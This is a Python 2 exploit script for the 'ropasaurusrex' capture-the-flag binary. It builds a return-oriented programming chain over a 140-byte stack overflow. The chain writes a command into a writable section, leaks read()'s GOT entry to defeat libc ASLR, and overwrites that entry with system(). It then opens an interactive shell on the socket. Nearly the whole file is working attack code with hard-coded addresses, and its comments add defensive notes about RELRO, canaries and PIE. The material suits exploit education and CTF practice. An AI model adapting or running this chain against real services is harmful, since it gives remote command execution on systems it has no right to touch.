#!/usr/bin/python
# Python 2 script (print statements, str payloads); it does not run under Python 3.
#
# ROP chain against the "ropasaurusrex" CTF binary: a stack buffer overflow
# (140 bytes of padding straight to the saved return address, so evidently no
# stack canary) drives three stages -- write a string into a writable section,
# leak a GOT entry to recover the randomized libc base, then overwrite that GOT
# entry.  Every address below is hard-coded for one specific binary and one
# specific libc build (see the objdump/ROPgadget notes next to each value).
#
# Defensive notes: full RELRO (read-only GOT after relocation) defeats the GOT
# overwrite in stage 3; a stack canary or PIE defeats the initial return-address
# hijack; the leak in stage 2 is what makes libc ASLR alone insufficient here.
import os, sys, socket
import struct
import telnetlib

# Target service: the vulnerable binary listening on localhost.
addr = ('127.0.0.1', 1337)

# Command to run, NUL-terminated so it is a valid C string when used as the
# system() argument later in the chain.
cmd = sys.argv[1]+"\0"

#see writeable sections objdump -x ropasaurusrex
#read() in libc offset (ldd ropasaurusrex copy libc path)
#and (objdump -d /lib/i386-linux-gnu/i686/cmov/libc.so.6 | grep _read)
#for system (objdump -d /lib/i386-linux-gnu/i686/cmov/libc.so.6 | grep _system)
# Offsets of read() and system() inside the *specific* libc build above; the
# leaked read() address minus/plus these gives system()'s runtime address.
libcread_offset = 0xdbe90
libcsystem_offset = 0x3e3e0


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Padding up to the saved return address; everything appended after this is
# popped by successive 'ret's as the chain executes.
payload = "A"*140

# Stage 1: read(0, .dynamic, len(cmd)) -- copies cmd (sent after the payload)
# into a writable section so it has a known address for stage 4.
# The pppr gadget pops the three arguments off the stack and returns to the
# next chain entry.
#write stdin .dynamic using read@plt
payload += struct.pack("<I", 0x0804832c) #read() call loc (objdump -d ropasaurusrex | grep read)
payload += struct.pack("<I", 0x080484b6) #pppr (ROPgadget --binary ropasaurusrex)
payload += struct.pack("<I", 0) #stdin
payload += struct.pack("<I", 0x08049530) #.dynamic (objdump -x ropasaurusrex)
payload += struct.pack("<I", len(cmd)) #length of cmd

# Stage 2: write(1, &GOT[read], 4) -- leaks the resolved libc address of read()
# back over the socket; this is what defeats libc ASLR.
#leak addr of read() in randomized libc
payload += struct.pack("<I", 0x0804830c) # write() call loc (objdump -d ropasaurusrex | grep write)
payload += struct.pack("<I", 0x080484b6) #pppr (ROPgadget --binary ropasaurusrex)
payload += struct.pack("<I", 1) #stdout
payload += struct.pack("<I", 0x0804961c)# read() in GOT (objdump -R ropasaurusrex)
payload += struct.pack("<I", 4) #len of read() address

# Stage 3: read(0, &GOT[read], 4) -- the 4 bytes sent in response to the leak
# replace read()'s GOT entry.  Requires a writable GOT (i.e. no full RELRO).
#call read@plt to overwrite the ptr stored in read()'s entry in GOT
payload += struct.pack("<I", 0x0804832c) #read() call loc (objdump -d ropasaurusrex | grep read)
payload += struct.pack("<I", 0x080484b6) #pppr (ROPgadget --binary ropasaurusrex)
payload += struct.pack("<I", 0) #stdin
payload += struct.pack("<I", 0x0804961c)# read() in GOT (objdump -R ropasaurusrex)
payload += struct.pack("<I", 4) #len of read() address

# Stage 4: read@plt now dispatches through the overwritten GOT entry, so this
# "read" call reaches whatever address was written in stage 3, with the string
# placed in .dynamic by stage 1 as its first argument.
#call read@plt = addr of system() in libc
payload += struct.pack("<I", 0x0804832c) #read() call loc (objdump -d ropasaurusrex | grep read)
payload += "BBBB" #bogus retn addr
payload += struct.pack("<I", 0x08049530) #.dynamic #system() arg (objdump -x ropasaurusrex)



s.connect(addr)

# The overflow itself, then the bytes consumed by the stage-1 read().
s.send(payload)
s.send(cmd)
#calculate system() addr and send back
# Expects exactly the 4 leaked bytes from stage 2; struct.unpack("<I", ...)
# raises struct.error if recv() returns any other length.
readaddr = struct.unpack("<I", s.recv(1024))[0]
print "libc read() found at 0x%.8x" % readaddr
# Rebase: libc_base = readaddr - read_offset, then add the system() offset.
systemaddr = readaddr - libcread_offset + libcsystem_offset
print "libc system() found at 0x%.8x" % systemaddr
# These 4 bytes are what the stage-3 read() stores into the GOT.
s.send(struct.pack("<I", systemaddr))

#pass in /bin/sh to get shell
# Reuse the already-connected socket for an interactive session; interact()
# blocks until the remote side closes or the user quits.
t = telnetlib.Telnet()
t.sock = s
t.interact()

# Only reached after the interactive session ends.
print s.recv(1024)

s.close()